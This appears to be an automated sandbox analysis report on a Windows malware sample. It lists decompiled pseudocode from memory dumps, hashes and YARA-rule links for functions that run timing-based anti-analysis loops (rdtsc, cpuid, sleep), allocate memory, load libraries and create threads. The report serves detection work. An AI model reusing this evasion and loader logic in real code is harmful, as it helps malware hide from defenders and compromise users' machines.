                                                                                                                                                                                                                                			E004D2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E004D11FC(_t73 - 0x29, _t52);
					_t37 = E004D153C(_t73 - 0x29);
					E004D2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E004D1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E004D272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E004D1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E004D2A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}














                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2434
                                                                                                                                                                                                                                0x004d2439
                                                                                                                                                                                                                                0x004d243f
                                                                                                                                                                                                                                0x004d244d
                                                                                                                                                                                                                                0x004d244d
                                                                                                                                                                                                                                0x004d244d
                                                                                                                                                                                                                                0x004d2512
                                                                                                                                                                                                                                0x004d2528
                                                                                                                                                                                                                                0x004d2450
                                                                                                                                                                                                                                0x004d2454
                                                                                                                                                                                                                                0x004d2456
                                                                                                                                                                                                                                0x004d245a
                                                                                                                                                                                                                                0x004d2460
                                                                                                                                                                                                                                0x004d2468
                                                                                                                                                                                                                                0x004d246e
                                                                                                                                                                                                                                0x004d2472
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x004d2474
                                                                                                                                                                                                                                0x004d2482
                                                                                                                                                                                                                                0x004d248c
                                                                                                                                                                                                                                0x004d249d
                                                                                                                                                                                                                                0x004d249f
                                                                                                                                                                                                                                0x004d24a4
                                                                                                                                                                                                                                0x004d24a7
                                                                                                                                                                                                                                0x004d24b0
                                                                                                                                                                                                                                0x004d24bf
                                                                                                                                                                                                                                0x004d24c1
                                                                                                                                                                                                                                0x004d24cc
                                                                                                                                                                                                                                0x004d24d2
                                                                                                                                                                                                                                0x004d24d7
                                                                                                                                                                                                                                0x004d24db
                                                                                                                                                                                                                                0x004d24e0
                                                                                                                                                                                                                                0x004d24e2
                                                                                                                                                                                                                                0x004d24f0
                                                                                                                                                                                                                                0x004d24f0
                                                                                                                                                                                                                                0x004d24fc
                                                                                                                                                                                                                                0x004d2501
                                                                                                                                                                                                                                0x004d2504
                                                                                                                                                                                                                                0x004d250d
                                                                                                                                                                                                                                0x004d250d
                                                                                                                                                                                                                                0x004d2504
                                                                                                                                                                                                                                0x004d24cc
                                                                                                                                                                                                                                0x004d24bf
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x004d24a7

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                • Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                • Instruction ID: 28d42934f20eed8785c79cf934048ed4a16f74c2843cdefae179293d6ead1ff8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F215E72300A40AADB119FB1E5607DD33A1EB98788F48442BDF4D57758EE3CD545C354
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 000007FEF8FB1370, Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 107memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
                                                                                                                                                                                                                                • API String ID: 4275171209-1517691801
                                                                                                                                                                                                                                • Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                • Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 000007FEF8FB11B0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66threadsynchronizationCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
                                                                                                                                                                                                                                • String ID: DllRegisterServer$G$_
                                                                                                                                                                                                                                • API String ID: 1174013218-1650116920
                                                                                                                                                                                                                                • Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                • Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 000007FEF8FB20A0, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 406memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocVirtual
                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                • API String ID: 4275171209-2766056989
                                                                                                                                                                                                                                • Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                • Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D10AC, Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ExitProcessSleepUser
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 354099737-0
                                                                                                                                                                                                                                • Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                • Instruction ID: 13eae77555258112db51aeec6f4f6118df6291359de66e63a1b21950defee537
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 21C01270200680D3E21F6724EA687282224A78030AF00061B830205BA08F3C04C8824B
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 000007FEF8FB3100, Relevance: 1.7, APIs: 1, Instructions: 216libraryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D260C, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,004D1E13), ref: 004D264B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                • Instruction ID: 6221b11e3f3113de9d37120006ce52089748759dcd53549c5060e51776a93c93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E01272724645D3DF12EB20E8543993361FBD4704F844127969E426A4EF7CC65DC708
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D1000, Relevance: 1.5, APIs: 1, Instructions: 13threadCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                • Instruction ID: 270b5c2ae13bb61eafc288b58ca37cc214afc129cdbd71e70cecd6b0dd039a3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37D0A7B2F1024093E7319710EA2679A2311F3D4315F804207CA4944A64CF3CC158C608
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Function 000007FEF8FB15D0, Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                                                • API String ID: 0-2567322570
                                                                                                                                                                                                                                • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 000007FEF8FB41BF, Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 004D1E50, Relevance: .0, Instructions: 47COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                			E004D1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}















                                                                                                                                                                                                                                0x004d1e50
                                                                                                                                                                                                                                0x004d1e50
                                                                                                                                                                                                                                0x004d1e50
                                                                                                                                                                                                                                0x004d1e50
                                                                                                                                                                                                                                0x004d1e55
                                                                                                                                                                                                                                0x004d1e5a
                                                                                                                                                                                                                                0x004d1e5f
                                                                                                                                                                                                                                0x004d1e60
                                                                                                                                                                                                                                0x004d1e6b
                                                                                                                                                                                                                                0x004d1e6b
                                                                                                                                                                                                                                0x004d1e71
                                                                                                                                                                                                                                0x004d1e73
                                                                                                                                                                                                                                0x004d1e84
                                                                                                                                                                                                                                0x004d1e86
                                                                                                                                                                                                                                0x004d1e8a
                                                                                                                                                                                                                                0x004d1e8e
                                                                                                                                                                                                                                0x004d1e92
                                                                                                                                                                                                                                0x004d1e96
                                                                                                                                                                                                                                0x004d1e98
                                                                                                                                                                                                                                0x004d1e9f
                                                                                                                                                                                                                                0x004d1ea2
                                                                                                                                                                                                                                0x004d1ea5
                                                                                                                                                                                                                                0x004d1eab
                                                                                                                                                                                                                                0x004d1ead
                                                                                                                                                                                                                                0x004d1eb8
                                                                                                                                                                                                                                0x004d1eba
                                                                                                                                                                                                                                0x004d1ec1
                                                                                                                                                                                                                                0x004d1ec4
                                                                                                                                                                                                                                0x004d1ec7
                                                                                                                                                                                                                                0x004d1ec7
                                                                                                                                                                                                                                0x004d1ee9

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                • Instruction ID: f3e1b554dc7274fed7b5a62bf9fe70d6722a63b38e138c448283c37a8f7b1c3a
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4201B5B2B14B908BDF248F36B600349B6A2F38D7C0F148536DB9C43B18DA3CD4958B04
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%